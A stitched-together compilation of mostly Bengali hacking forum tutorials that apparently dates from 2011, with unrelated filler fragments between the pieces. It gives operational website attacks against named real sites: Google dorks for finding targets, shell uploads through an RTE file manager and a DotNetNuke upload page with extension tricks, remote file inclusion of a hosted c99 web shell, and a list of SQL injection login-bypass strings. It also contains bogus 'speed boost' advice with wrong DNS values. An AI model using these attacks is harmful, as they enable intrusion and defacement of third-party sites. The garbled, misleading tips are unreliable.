meeeeee

ওয়েবসাইট হ্যাক করুন দুনিয়ার সবচেয়ে সোজা ট্রিক্স দিয়ে!!!

টিউন করেছেন : Snip3r | প্রকাশিত হয়েছে : 5 November, 2011 on 1:10 pm | 3,679 বার দেখা হয়েছে | 46

Advertisement -

বেশ কিছুদিন পর আবার বস্লাম টুইট করতে। এই টুট পরে আপনি পারবেন কিছু ওয়েবসাইট
খুব সহজে হ্যাক করতে।
আসুন মিশনে নামি।
প্রথমে গুগলে যান।
সার্চ করুন এই ডর্ক দিয়ে।
inurl:rte/my_documents/my_files
অথবা
inurl:/my_documents/my_files/
আমি করে পেয়েছি
http://www.jrf.org.tw/newjrf/rte/my_documents/my_files/
my_documents/my_files/ রিপ্লেস করুন নিচের Vuln Link
দিয়ে।
RTE_popup_file_atch.asp
অথবা
RTE_popup_file_atch.asp
আমি করেছি,
http://www.jrf.org.tw/newjrf/rte/RTE_popup_file_atch.asp
নিচের ছবির মত আপ্লোডার সহ একটি ফাইল ম্যানেজার পাবেন।

ব্যাস, প্রায় শেষ!!
এখান থেকে আপনার ডিফেস পেজ বা শেল আপ্লোড দিন।
নিচের ছবি দেখুন।

আপনার শেলটি / ডিফেস পেজটি লোকেট করে উপলোড করুন।
এটি নিজেই ফাইল পাথ আপনাকে দেখিয়ে দেবে।

ফাইল প্রিভিউ সহ!!!
আমি শেল আপ্লোড দিয়েছি।
http://www.jrf.org.tw/newjrf/rte/my_documents/my_files/1B1_fs20.asp;.jpg

আপনার শেলটি আপ্নলোদের পুর্বে এক্সটেসনটি চেঞ্জ করে নিতে ভুল্বেন না।
যেমন, shell.asp;.jpg , shell.asp;.txt ইত্যাদি ইত্যাদি।।
শেষ... আমাদের ফোরামে আসার আমন্ত্রন রইলো।

xsssssssssssss

[TUT] Boost your internet speed

Fuck The Hell Out Of Your Internet - Get Maximum Speed!
Well thanks for visiting this is my first tutorial in a thread
So Here We go Just Follow me:-

1.Open your Network and Sharing center.
2.Click on Local Connection.
3.Click on Properties.
4.Then Double click Internet Protocol Version 4.
5.Change Obtain DNS Server Automatically to Use Following DNS Server.
6.Type in Preferred DNS Server = 208.67.222.222 (OR YOU CAN USE GOOGLE'S DNS TOO its 8.8.8.8)
7.Type in Alternate DNS Server = 208.67.220.220(for google its 6.6.8.8)
8.Clcik OK, then OK, then Close everything until Desktop Appears.
9.Restart your PC/Laptop and see the difference.
Then,

1. Go To Run
2. Type system.ini
3. Copy and Paste (Delete Everything)
--------------------------------------
page buffer=100000kbps load=100000kbps
Download=100000kbps save=100000kbps
back=100000kb
--------------------------------------
4. Then Save

Also works for VIsta
Just type system.ini in the search box

Run notepad as administrator

Goin forward---

I Would RecommenD Installing the following softwares:-
1.)If Your using wifi then use TCP OPTIMIZER

Here is link to TCPoptimizer-
http://www.download.com/SG-TCP-Optimizer...15840.html

2.)You Can even use Getfullspeed If u think it works..:/

3.) Use IDM...im damn sure u guys would use it

4.) Use RAMRUSH its a pretty cool software which optimizes ur ram and interent speed

5.) LasT BUt not the least download AUTOBAHN ...its a small software that runs in the background...and reduces time to buffer video and internet speed

--------IF I GET MORE WAYS ILL EDIT THIS--------------
i might add some more methods in 2 or 3 days
Cheerz! my net is now DAMN FAST!

jiiiiii

[TUT]How to hide any file inside a picture[TUT] No Binder Needed!!!

This tutorial can be used for any type of file including mp3,wmv,.rar,etc

Here is how it goes:

1. Open C: Drive and make a folder in it e.g. “hacks”. Put both the files i.e. the file that you want to hide and the image inside which you want to hide the file into this folder



2. Select both the files and make a compressed RAR archive e.g. “secret.rar” out of them



3. Open Run and type in “cmd” to open the Command Prompt. Now type “cd..” and press enter and repeat this once again. Type “cd sizlopedia” to open the folder (where “hacks” is the folder that I am using in this tutorial)



4. Type the command “copy /b maria.jpg + secret.rar safe.jpg” and press enter



5. The new picture safe.jpg is now the nested Picture file which has the hidden file saved inside it. Change its extension from .jpg to .rar anytime to access or extract the hidden file


Definitely cool and amazing trick.

xvcvzxcvcv

এই টিউনের কেউ অপব্যবহার করবেন না। এটি শুধু মাত্র শিখার জন্য, কারও ক্ষতি করার উদ্দেশ্যে নয়। কেউ এই টিউনে অপব্যবহার করে কারও ক্ষতি করলে টিজে দায়ী নয়।

blogger

আমরা তো হ্যাকিং করব! কিভাবে করব? DNN এর মাধ্যমে। কিন্তু আপনারা কি DNN এর পূর্ণরূপ জানেন? DNN এর পূর্ণ রূপ হল DotNetNuke. এখন হয়ত আপনাদের কাছে একটু কঠিন মনে হয়। টিউনে শেষে বলবেন যে, এটা তো এক্কেবারে সহজ। বলতে গেলে SQL-Injection ও Cross Site Scripting এর মতো। আমি আজ দেখাব আপনার টার্গেটের সাই্টটি হ্যাকিং করে ফাইল আপলোড করা। মূলতঃ DotNetNuke হল Microsoft .NET technology এর উপর তৈরি করা বিভিন্ন ওয়েবসাইট প্লাটফরম।

blogger template

What’s New.

• You’ll not only be able to display you tags in a list, but you can display your labels in A Labels Cloud as well.
• You can choose now which labels will be displayed.
• You can customize it using css codes. >> Learn how to do it  soon | next tutorial
• It has 5 variations, all labels will be grouped in 5 groups.depending on each label usage in your blog.
• Now you can choose if you want to show number of posts per label or not.

meee

আসসালামু আলাইকুম, সবাইকে আবারও আজকের হ্যাকিংয়ের টিউনে স্বাগতম। কেমন আছেন সবাই?  আশা করি সবাই মহান সৃষ্টিকর্তার অশেষ রহমতে খুবই ভাল আছেন। আজ আবারও আপনাদের সামনে হাজির হয়েছে আরেকটি হ্যাকিংয়ের টিউন নিয়ে। আজকের পর্বে আপনাদের দেখাব DNN এর মাধ্যমে একটা ওয়েবসাইট হ্যাকিং করা। খুবই মজা হবে তাই না? তাহলে চলূন মূল পর্বে….

আমরা তো হ্যাকিং করব! কিভাবে করব? DNN এর মাধ্যমে। কিন্তু আপনারা কি DNN এর পূর্ণরূপ জানেন? DNN এর পূর্ণ রূপ হল DotNetNuke. এখন হয়ত আপনাদের কাছে একটু কঠিন মনে হয়। টিউনে শেষে বলবেন যে, এটা তো এক্কেবারে সহজ। বলতে গেলে SQL-Injection ও Cross Site Scripting এর মতো। আমি আজ দেখাব আপনার টার্গেটের সাই্টটি হ্যাকিং করে ফাইল আপলোড করা। মূলতঃ DotNetNuke হল Microsoft .NET technology এর উপর তৈরি করা বিভিন্ন ওয়েবসাইট প্লাটফরম।

এই টিউনের কেউ অপব্যবহার করবেন না। এটি শুধু মাত্র শিখার জন্য, কারও ক্ষতি করার উদ্দেশ্যে নয়। কেউ এই টিউনে অপব্যবহার করে কারও ক্ষতি করলে টিজে দায়ী নয়।

হ্যাকিং শুরু

• প্রথমে Google Dorks দিয়ে একটি একটি ওয়েবসাইটকে টার্গেট করব।

inurl:”/portals/0″ site:.com 

• এখানে দেখেন কোডটির শেষে .com দেয়া আছে। আপনি ইচ্ছা করলে আপনার ইচ্ছা মতো ডোমেইন ব্যবহার করতে পারবেন। যেমন- bd, ph, ae, net, org ইত্যাদি
• এবার কোডটি Google এ সার্চ দিন।
• তাহলে আপনাকে সার্চ রেজাল্টে অনেকগুলো  ওয়েবসাইটের ফলাফল দিবে।
• এবার এখান থেকে একটিকে টার্গেট করুন। মানে একটির উপর ক্লিক করুন।
• মনে করি আপনি এই সাই্টটিকে টার্গেট করলেন www.victim.com
• এখন আমরা এই সাইটটির vulnerability পরীক্ষা করব।
• এজন্য নিচের কোডটি সাইট লিংকের পরে বসিয়ে এন্টার দিন।

Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 

• লিংকের পরে বসালে হবে

www.victim.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

• এবার যদি নিচের ছবির মতো আসে, তাহলে বুঝবেন যে এটিকে হ্যাকিং করা যাবে।

• এবার এখান থেকে শেষের অপশানটি নির্বাচন করুন “A File On Your Site”
• এবার নিচের কোডটি লিংকের ঘরে লিখুন।

javascript:__doPostBack(‘ctlURL$cmdUpload’,”)

• যদি আপনি সব কিছু পারেন, তাহলে আপনি এই সাইটে .swf .jpg .gif .pdf ফাই্ল আপলোড করতে পারবেন।
• আপনি আপনার ফাই্ল আপলোড করার পর আপনার ফাইলের লিংক পাবেন এই রকম

www.victim.com/portals/0/yourfile.extension

• মনে করুন আপনি b.txtফাইল আপলোড করেছেন, তাহলে হবে এই রকম।

www.victim.com/portals/0/b.txt

• তাহলে হবে এই রকম

• হা হা হা হা হা হা হা হা। কেমন লাগল? আশা করি এখন আপনি নিজে নিজেই পারবেন।

এখন আপনারা প্রশ্ন করতে পারবেন যে, যদি আমি নির্দিষ্ট সাই্ট হ্যাকিং করতে চাই, তাহলে কি করব?

উত্তর হবে, এটা হল Ethical Hacking টিউটোরিয়াল। এটা Black Hat হ্যাকিং টিউটোরিয়াল নয়। তাই্ আমি এভাবেই দিলাম।

সবাই্ ভাল থাকবেন, ধন্যবাদ। আল্লাহ হাফেজ……..

meeeeeeeeeeeee

হ্যাকার ফোরাম :

আপনি একজন হ্যাকার হতে হলে প্রথমে আপনাকে বিভিন্ন ইথিকাল হ্যাকার যারা মূলত ইলিট (এ ব্যাপারে আগের অধ্যায়ে বলা হয়েছে) তাদের থেকে গুরুত্বপূর্ণ টিপসগুলো শিখে নিতে হবে। আর বিভিন্ন ধরনের টিপস নিয়ে আলোচনা হয় ফোরামে। নিচে হ্যাকারদের জন্য কয়েকটি গুরুত্বপূর্ণ ফোরামের লিংক প্রদান করা হল। ফোরামগুলোতে যোগদিন এবং নিয়মিত পোষ্টগুলো পড়ুন। কোন বিষয় জানতে চাইলে সেখানেই সাহায্য চাইতে পারেন।

• www.hackerthreads.org
• www.hackforums.net
• www.hacker.org/forum
• www.crackhackforum.com

হ্যাকিং রিসোর্স :

হ্যাকিং করতে হলে বিভিন্ন সফটওয়্যার প্রয়োজন হয়, প্রয়োজন হয় কোড, স্ক্রিপ্ট, ডর্ক ইত্যাদির। নিচে কিছু লিংক দেয়া হল যেখান থেকে আপনি অনেক মূল্যবান হ্যাকিং রিসোর্স পেতে পারেন যা আপনাকে হ্যাকার হতে সাহায্য করবে।

• http://www.ethicalhacker.net
• http://insecure.org
• http://hacker.resourcez.com
• http://www.certifiedethicalhacker.com
• http://www.elitehack.net
• http://www.elite-hackers.com
• http://www.exploit-db.com
• http://www.1337day.com
• http://www.breakthesecurity.com
• http://www.thehackerslibrary.com
• http://www.port7alliance.com
• http://www.hackers.nl
• http://hackmein.tripod.com
• http://kyrionhackingtutorials.com
• http://www.hacking-gurus.net
• http://hackmyass.wordpress.com
• http://www.borntohack.in
• http://www.criticalsecurity.net
• http://www.mpgh.net
• http://www.duniapassword.com
• http://www.progamercity.net

meeeeeeeeeeeeeeeeeee

আজ দেখাব Remote file inclusion হ্যাকিং। ওহ! আপনারা হয়ত জানেন না যে, হ্যাকিং করার থেকে হ্যাকিং নিয়ে পোষ্ট লেখা আরও কঠিন ও কষ্টকর। যদি পোষ্ট করতেন তাহলে বুঝতেন। থাক পোষ্ট করা লাগবে না, শুধু মন্তব্য করলেই হবে। মন্তব্য করলে পোষ্টের টিজেরা উৎসাহিত হয়। এতে তাদের লেখার গতি ও স্বাচন্দ্যও বাড়ে। তাহলে আর কথা নয় এবার শুরু হয়ে যাক পোষ্টটি…..

Remote file inclusion হ্যাকিং, একে সংক্ষেপে বলে RFI হ্যাকিং। এটি অনন্যা হ্যাকিং ম্যাথডের মধ্যে এটিও একটি অন্যতম জনপ্রিয় ম্যাথড। অন্যন্যা পদ্ধতির মতো এই পদ্ধতিতেও আপনাকে ওয়েবসাইটের vulnerability বের করতে হবে। এই vulnerability এর মাধ্যমে একজন হ্যাকার একটি ওয়েব সার্ভারের remote file যুক্ত করতে পারে। আশা করি RFI হ্যাকিং সম্পর্কে মোটামুটি ধারণা পেয়েছেন।

—————————————————————————————————————————————————— কোন সাইটটি vulnerable ? কিভাবে বুঝবেন? খুবই কঠিন প্রশ্ন, তাই না? এই প্রশ্নের উত্তর জানার জন্য নিচের লিংকটি দেখেন….

http://www.targetsite.com/index.php?page=Anything

উপরের লিংকের মতোই দেখতে পাবেন, যেগুলো আপনি খুঁজচ্ছেন তন্ন তন্ন করে। এখন এগুলো বাহির করবেন কিভাবে? গুগল ডক দরকার ? নিন নিচে গুগল ডক দিলাম।

“inurl:index.php?page=”

উপরের ডকটি গুগলে নিয়ে সার্চ দিন। তাহলে আপনাকে “index.php?page=” এই টাইপের যত ওয়েবসাইট আছে, সবগুলো ওয়েবসাইট গুগল আপনার সামনে এনে হাজির করবে। এখন কোন ওয়েবসাইটটি আজকের ম্যাথডের জন্য vulnerable তা পরীক্ষা করে দেখতে হবে। কিভাবে করবেন ? নিচের মতো করে করুন।

http://www.targetsite.com/index.php?page=www.google.com

এখন মনে করেন আমি আমি http://www.cbspk.com/ এই সাইটটি খুঁজে পেয়েছি। এখন আমরা চাইব এটা vulnerable কি না। তাহলে লিখুন….

http://www.cbspk.com/v2/index.php?page=http://www.tunerpage.com

তাহলে এটি দেখাবে…

এখন যদি উক্ত ওয়েবসাইটটি অন্য ওয়েবসাইট নিয়ে খোলে তাহলে বুঝবেন যে এই ওয়েব সাইটে RFI ইঞ্জেকশান দেয়া যাবে। এবার আসুন পরের ধাপে…

এরপর সাধারণত হ্যাকাররা তার ভিকটিমের ওয়েবসাইটে যে কোন Shells আপলোড করে, যাতে তার কাজটি সবাইকে দেখাতে । মানে প্রমাণটি। বেশিরভাগ হ্যাকাররা c99 shell বা r57 shell আপলোড করে। আমি আপনাদের দেখাব c99 shell আপলোড করা। এজন্য হ্যাকাররা যে কোন একটি ওয়েবহোষ্টটিং সাইটে তাদের সেল আপলোড করে নেয়। যেমন- ripway.com, 110mb.com ইত্যাদি। এখন মনে করেন আমি ripway.com এই সাইটে সেল আপলোড করলাম। তাহলে আমার লিংক হবে…

http://h1.ripway.com/tjunselected/c99shell.php?

এবার হ্যাকার ওয়েবসাইটটিতে একটি কমান্ড দিবে।  কমান্ডটি হবে

http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/tjunselected/c99shell.php?

এখন তাহলে এটি ওয়েবসাইট দেখব। দেখেন, কি দেখেন ?

তবে অবশ্যই মনে রাখবেন লিংকের শেষে “ ? ” প্রশ্নবোধক চিহ্নটি লাগিয়ে দিবেন। নতুবা আপনার শেল কাজ করবে না।

meeeeeeeeeeeeeeeeeeeeeeee

শিরোনাম দেখেই আশা করি বুঝে গেছেন পোষ্টটি কি নিয়ে ? জ্বী, ঠিকই ধরেছেন। আজ দেখাব মাত্র ৫ মিনিটে কিভাবে একটি ওয়েবসাইট বস্কাইয়া (হ্যাকিং) দিতে হয়। খুবই মজা হবে। আমার মনে হয় উৎসুক জনতা এই নিয়মটা শিখার জন্য অনেক আগ্রহী হয়ে বসে আছে। পোষ্ট তো করেই যাচ্ছি কিন্তু মন্তব্যই পাই না। দেখা যায় যে একটা পোষ্ট করার কিছুক্ষণ পর দেখা যায় ৩০০-৪০০ জন ভিজিটর পড়ে ফেলেছে। কিন্তু ঐ সময় দেখা যায় মন্তব্য এসেছে ১, ২ বা ৫টা। এই ভাবে চললে লিখতে কার ভাল লাগে। আপনাদের তো আর বলি না লিখতে পোষ্টটি পড়ে সব শিখ ফেলেছেন কিন্তু এরপর কাজটাও সেরে ফেলেছেন। কিন্তু কিন্তু একটা মন্তব্য করার মতো আর সময় পেলেন না। এই জন্যই আমরা বাঙ্গলী। যাক চলুন পোষ্টে……….। শিখে ফেলি কিভাবে ৫ মিনিটে একটা ওয়েবসাইট হ্যাকিং করতে হয়।

এই কাজটি আমরা authentication bypass পদ্ধতিতে এডমিন আইডি হ্যাকিং করব। হ্যাকিং শুরু করুন।

• প্রথমে আমরা যাব www.google.com এ।
• এবার Search বক্সে যে কোন একটি Google dork লিখুন।
• আপনাদের সুবিধার্থে আমি sql injection কিছু দিয়ে দিলাম নিচে।

"inurl:admin.asp"  

"inurl:login/admin.asp"  

 "inurl:admin/login.asp" 

"inurl:adminlogin.asp"

 "inurl:adminhome.asp" 

 "inurl:admin_login.asp" 

 "inurl:administratorlogin.asp" 

"inurl:login/administrator.asp"

 "inurl:administrator_login.asp"

"inurl: admin.php"

   "inurl: login/admin.php" 

 "inurl: admin/login.php" 

 "inurl: adminlogin.php" 

 "inurl: adminhome.php" 

 "inurl: admin_login.php" 

 "inurl: administratorlogin.php" 

 "inurl: login/administrator.php" 

 "inurl: administrator_login.php"

• এবার সার্চ দিন। তাহলে অনেক গুলো ফলাফল পাবেন।
• যে কোন একটি সাইটে প্রবেশ করুন। তাহলে সাইটটি আপনাকে নিচের মতো কিছু দেখাবে…

welcome to xxxxxxxxxx administrator panel 

username :

 password :

• এখানে ইউজার নেম দিনঃ “Admin”
• তাহলে পাসওয়ার্ড কি দিবেন ? সমস্যা নাই আমিও নাই 
• নিচে কিছু sql injections দিলাম। এখান থেকে যে কোন একটি দিন।

' or '1'='1

' or 'x'='x

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1-- 

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

'or'1=1' 

• তাহলে আপনার লগইন স্ক্রীণ হবে এই রকম…

username:Admin 

 password:'or'1'='1

• এবার submit এ ক্লিক করুন।
• ব্যস কাজ শেষ আপনি এখন রাজা যদি ছেলে হন আর মেয়ে হলে রাণী 

মনে রাখবেন, প্রত্যেকটি সাইট vulnerable নয়। যে সব সাইট vulnerable সেগুলোতে কাজ করবে।

হ্যাকিং শুধু মাত্র শিখার জন্য। এটির কষ্ট করে অপব্যবহার করবেন না। এই পোষ্টের অপব্যবহারে কেউ ক্ষতি গ্রস্থ হলে টিজে এর জন্য দায়ী নয়।

সবাইকে অনেক অনেক ধন্যবাদ। ভাল থাকুন ও ভাল রাখুন আপনার পাশের লোকটিকে। আল্লাহ হাফেজ………